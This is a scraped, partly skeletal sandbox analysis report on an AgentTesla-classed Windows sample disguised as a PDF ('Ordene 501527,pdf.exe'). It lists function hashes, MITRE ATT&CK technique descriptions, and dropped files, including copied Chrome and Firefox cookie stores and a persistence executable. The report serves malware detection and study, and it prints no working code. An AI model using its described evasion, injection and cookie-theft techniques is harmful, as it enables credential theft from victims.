P, xrefs: 02610D92
LRk, xrefs: 02610DD2

Memory Dump Source

Source File: 00000010.00000002.40181927888.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2610000_flex.jbxd

Similarity

API ID:
String ID: LRk$LRk$P
API String ID: 0-4257887857
Opcode ID: 2b3ef20933cb3d996eaec60061620403a007108053e3ecf44f9075e224f81d2f
Instruction ID: 9f3e45bf9c8cfdd38d4b885eb445ff10088aaaefc1a32bda10841e794a013c0f
Opcode Fuzzy Hash: 2b3ef20933cb3d996eaec60061620403a007108053e3ecf44f9075e224f81d2f
Instruction Fuzzy Hash: F5419E71F102189FCB14DB64C450BAEB7B2EF89704F14866DD816AB391DB71EC86CB81

Uniqueness

Uniqueness Score: -1.00%

Function 026106E4 Relevance: 1.5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

Strings

8k, xrefs: 02610874

Memory Dump Source

Source File: 00000010.00000002.40181927888.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2610000_flex.jbxd

Similarity

API ID:
String ID: 8k
API String ID: 0-238857276
Opcode ID: 98a53ff18cd8952dfa14e4b075e2efa6195dc7e714316fcc7fcf1ef6b2658002
Instruction ID: 59b88558f58bc845a4cd68f8f0c5f15052d263b7ea61d8bd4e1efea9ed26cff0
Opcode Fuzzy Hash: 98a53ff18cd8952dfa14e4b075e2efa6195dc7e714316fcc7fcf1ef6b2658002
Instruction Fuzzy Hash: 1931D370A043849FE705EFB6D861749BFB2ABCD204F18C4ADC448973AADB381906DB01

Uniqueness

Uniqueness Score: -1.00%

Function 02610B08 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

LRk, xrefs: 02610B2D

Memory Dump Source

Source File: 00000010.00000002.40181927888.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2610000_flex.jbxd

Similarity

API ID:
String ID: LRk
API String ID: 0-1084127097
Opcode ID: 151e111af3bd205dac489310a9f4639dd3f4918f36e0ad501ec1145e6ac40f2f
Instruction ID: 8f261ee29e83616c6e47ca3168f89b0052b09be523f57bb2097ec3670d60ecf7
Opcode Fuzzy Hash: 151e111af3bd205dac489310a9f4639dd3f4918f36e0ad501ec1145e6ac40f2f
Instruction Fuzzy Hash: 15414178B00214DFDB04EBB4D898AADBBB2FF8D305B148528E90697365DF34E846DB54

Uniqueness

Uniqueness Score: -1.00%

Function 026109F0 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

tPk, xrefs: 02610A8F

Memory Dump Source

Source File: 00000010.00000002.40181927888.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2610000_flex.jbxd

Similarity

API ID:
String ID: tPk
API String ID: 0-3531055577
Opcode ID: d83faeefee9df76e9e96952ecb15c683117c4e3531b82c8e1e7692bec4611d73
Instruction ID: 887fc7721c206b8c728a59e87564e2a28d852cc1f7dfa55362573deb4751abc9
Opcode Fuzzy Hash: d83faeefee9df76e9e96952ecb15c683117c4e3531b82c8e1e7692bec4611d73
Instruction Fuzzy Hash: 952149353402148FCB49EB38C45896C37A2AF8A61932604B8E906CF7B2DF35DC86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02610848 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

8k, xrefs: 02610874

Memory Dump Source

Source File: 00000010.00000002.40181927888.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2610000_flex.jbxd

Similarity

API ID:
String ID: 8k
API String ID: 0-238857276
Opcode ID: 0645f8af34cd018bf904289667a10da3c24dbda811aa837df31419cbdcdea67e
Instruction ID: 7ef623d1477d4d30a11743c2268fee13e5b1d6dee929a5acea637afcdbbf0795
Opcode Fuzzy Hash: 0645f8af34cd018bf904289667a10da3c24dbda811aa837df31419cbdcdea67e
Instruction Fuzzy Hash: 6D216D74A043489FE749EFAAE961749BBA7ABCC204F14C479C508973AADB381906DB01

Uniqueness

Uniqueness Score: -1.00%

Function 02611048 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.40181927888.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2610000_flex.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 656b20c02f9387e9d7cd14c009dfb6a3cea94393d73e5b5b268c5259448db424
Instruction ID: 8ad6a3990ba0e69eb7972b9e8f02de9af42e36199263ddf4c9692cf435beb3dc
Opcode Fuzzy Hash: 656b20c02f9387e9d7cd14c009dfb6a3cea94393d73e5b5b268c5259448db424
Instruction Fuzzy Hash: CE310474A083984FCB05EB75D8659AE7FB2EF85200B1585BEE905DB392CB348D05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02610EF8 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.40181927888.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2610000_flex.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c734c43b8e0e7ec647a54f3f99a22db9d2cd4c013de863fb1024846035031b89
Instruction ID: 175c240791f3f1275b6dbb70273a9c89e8ec7bd8dd106a64d06b29f4f305a02e
Opcode Fuzzy Hash: c734c43b8e0e7ec647a54f3f99a22db9d2cd4c013de863fb1024846035031b89
Instruction Fuzzy Hash: 282137307043518FCB16D7759855B5A7BB4AFC9304F18C4AAEC14CB3A6DB74D88ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 02610C73 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.40181927888.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2610000_flex.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 749086262c561b33f76606ec64dada67908ec766b2970ec03f4723b769f6057f
Instruction ID: 147fad0d0aea8b0f0998fd7d40c23c04b58ad5d835976455cbdf38a447af51dd
Opcode Fuzzy Hash: 749086262c561b33f76606ec64dada67908ec766b2970ec03f4723b769f6057f
Instruction Fuzzy Hash: 27116A74E01208DFDF08EFA5E958AAD7BB2AF48205F248429E81697361DF74A846CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0261096A Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.40181927888.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2610000_flex.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65c3620dde90382df91c088a7581e8df685a5a51f5edd5b11954d5c03fded457
Instruction ID: b524a7ce4a43005f326e02c3a7705c967d0e01f565375196554440c0f54b06a0
Opcode Fuzzy Hash: 65c3620dde90382df91c088a7581e8df685a5a51f5edd5b11954d5c03fded457
Instruction Fuzzy Hash: C9017C35D04244CFCB44EFB4E8595AD7BB4FF08211B248AAEE816D72A0CB309906CF80

Uniqueness

Uniqueness Score: -1.00%

Function 02610978 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.40181927888.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2610000_flex.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51ab951ad013b0efa05073bd0a7a02a0dc92d290e7cf68ac433f3bbefd5fa9f9
Instruction ID: df243ecef8a364f56b326df344eff0b2b2ee9a7a7b31083499a225a9a0419610
Opcode Fuzzy Hash: 51ab951ad013b0efa05073bd0a7a02a0dc92d290e7cf68ac433f3bbefd5fa9f9
Instruction Fuzzy Hash: AF018131D00214CFCB48EFB4E8595AE7BB5FB48311B14856AE416D72A0DB349902CF80

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Ordene 501527,pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\flex.exe.log

C:\Users\user\AppData\Local\Temp\nsd84B6.tmp\System.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\FanControlWrapper.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\Microsoft.Office.Tools.Common.v9.0.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\edit-cut-symbolic.svg

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Perciform\Selskabelig\Hjemmeopgaven\vrkstedsbygninger\Ricciaceae185.Inc

C:\Users\user\AppData\Roaming\ec0qfe1f.342\Chrome\Default\Cookies

C:\Users\user\AppData\Roaming\ec0qfe1f.342\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite

C:\Users\user\AppData\Roaming\flex\flex.exe

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Windows Analysis Report
Ordene 501527,pdf.exe

Function 00403350 Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412
stringfilecomCOMMON

Function 004065A2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14
fileCOMMON

Function 00403D1B Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Function 0040396D Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402EC1 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Function 00406281 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Function 004052C3 Relevance: 10.6, APIs: 7, Instructions: 72
stringwindowCOMMON

Function 004065C9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
COMMON

Function 00405D80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre